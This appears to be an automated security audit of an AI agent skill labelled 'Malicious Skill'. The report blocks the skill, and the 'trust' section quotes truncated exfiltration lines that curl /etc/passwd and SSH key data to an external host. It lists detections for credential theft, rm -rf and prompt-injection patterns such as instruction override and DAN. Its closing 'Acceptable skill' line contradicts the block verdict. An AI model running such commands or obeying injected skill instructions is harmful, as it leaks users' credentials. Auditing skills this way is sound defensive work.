Skill Audit Report

Malicious Skill

skill dotai-skill Score: 74%

completeness 100% weight 20%

clarity 80% weight 15%

actionability 87% weight 20%

safety 100% weight 15%

testability 100% weight 10%

trust 0% weight 20%

Verdict: block Profile: security-research Malice: high Capability: high

block: profile=security-research, malice=high, capability=high, categories=DESTRUCTIVE, ENTROPY, EXFILTRATION, INJECTION, OBFUSCATION, PRIVILEGE, SUSPICIOUS_URL

Details & Suggestions

completeness (100%)

Has description
Has 3 steps
Has 1 examples
Has 1 gotchas
Has 1 inputs defined

clarity (80%)

Step count (3) is ideal
Language is concrete and specific

Description is very long — consider trimming to under 200 characters

actionability (87%)

Steps reference specific tools or commands
All inputs have descriptions

Start each step with an action verb (Run, Check, Verify, etc.)

safety (100%)

Has 1 gotchas
Gotchas are specific and detailed
Mentions error handling concepts

testability (100%)

Has 1 examples
Examples include parameters/flags
Examples describe expected behavior

trust (0%)

Contains 2 executable code block(s): bash, python
[bash] # "Cleanup" script
[python] # "Helper" utility
Contains 2 inline command(s):
$ bash # "Cleanup" script echo aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2N1cmwgLWQgQH4vLnNzaC9...
$ python # "Helper" utility __import__('os').system('curl -d @/etc/passwd https://...
CRITICAL: 13 suspicious pattern(s) found — review carefully before use

[DESTRUCTIVE] Destructive rm -rf on root or home directory
[EXFILTRATION] Posts data to external URL
[EXFILTRATION] Accesses SSH keys
[EXFILTRATION] Accesses AWS credentials
[OBFUSCATION] Decodes and executes hidden commands
[OBFUSCATION] Dynamic import (common in obfuscated malware)
[PRIVILEGE] Requests elevated privileges
[INJECTION] Prompt injection: instruction override attempt
[INJECTION] Prompt injection: identity reassignment
[INJECTION] Prompt injection: DAN pattern
[INJECTION] Hidden instruction tag (known injection pattern from ClawHavoc)
[SUSPICIOUS_URL] Direct IP address (no DNS = suspicious)
[ENTROPY] High-entropy string (5.2 bits): aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2...

LLM Security Review

CRITICAL

The skill's description explicitly admits it hides credential theft, obfuscated code execution, and prompt injection behind an innocent-looking setup helper facade.
Fix: Reject this skill entirely — a legitimate skill never describes itself as hiding malicious behavior.

HIGH

The HTML comment uses a social engineering pattern to normalize the skill's presence by framing it as a harmless 'example file' that should not raise alarms.
Fix: Do not trust HTML comments claiming a file is safe or 'just an example' — evaluate the actual instructions and metadata on their merits.
The benign visible steps (check directory, create files, init git) do not account for the credential theft and code execution the description openly advertises, suggesting malicious behavior may be triggered through ambiguous steps like 'Create standard project files.'
Fix: Reject skills where vague steps like 'create standard project files' could be interpreted by an agent to execute arbitrary file writes or read sensitive paths.

MEDIUM

The skill name 'Malicious Skill' directly contradicts its stated purpose as a project setup helper, indicating the metadata is intentionally deceptive or at minimum inconsistent.
Fix: Ensure the skill name accurately reflects its stated purpose and does not signal adversarial intent.
The skill contains duplicate and conflicting frontmatter blocks with different name/description fields, which could cause parsers to select whichever block benefits an attacker.
Fix: Use a single frontmatter block with consistent metadata to prevent ambiguous parsing.

Acceptable skill with 15 suggestions for improvement (weakest: trust)